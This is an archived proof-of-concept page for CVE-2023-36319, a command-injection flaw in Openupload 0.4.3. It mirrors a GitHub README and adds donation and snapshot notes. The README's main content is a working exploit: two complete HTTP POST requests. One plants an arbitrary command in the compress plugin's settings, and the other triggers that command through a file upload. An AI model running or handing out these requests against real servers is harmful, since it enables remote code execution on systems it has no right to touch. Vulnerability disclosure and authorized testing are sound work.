Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-36319 PoC — Openupload Stable 代码问题漏洞

Source
https://github.com/Lowalu/CVE-2023-36319
Associated Vulnerability
Title:Openupload Stable 代码问题漏洞 (CVE-2023-36319)
Description:Openupload Stable是一个Web应用。 Openupload Stable v.0.4.3版本存在安全漏洞,该漏洞源于文件compress-inc.php存在文件上传漏洞。攻击者可利用该漏洞通过action参数执行任意代码。
Description
exp4CVE-2023-36319
Readme
# CVE-2023-36319

By modifying the compression plug-in command, the attacker can cause the server to execute arbitrary commands during the upload process.


**Only used for authorized security testing, please do not use it for illegal purposes. Violations have nothing to do with the author.**

## Affected version:
[openupload Stable version 0.4.3](https://openupload.sourceforge.net/)

### Step one
Log in to the backend and click on the function:
Administration ->Plugins ->compress

Add new “command” directive and save:

```
POST /index.php HTTP/1.1
Host: www.test.com
Content-Length: 183
Cache-Control: max-age=0
Sec-Ch-Ua: "Not.A/Brand";v="8", "Chromium";v="114", "Google Chrome";v="114"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

action=adminpluginsoptions&step=4&id=compress&gid=admins&command=<YOUR CMD>&extension=&compression=
```

### Step two
Enter the "File upload" function, upload a random file, and ensure "compress=0" in the parameters.

```
POST /index.php HTTP/1.1
Host: www.test.com
Content-Length: 53
Cache-Control: max-age=0
Sec-Ch-Ua: "Not.A/Brand";v="8", "Chromium";v="114", "Google Chrome";v="114"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

action=u&step=3&description=123&emailme=no&compress=0
```
The commands we write will be executed normally.
File Snapshot

 [4.0K]  /data/pocs/4c519056308b5b8f15772acda0c94510e75e93a0
└── [2.0K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.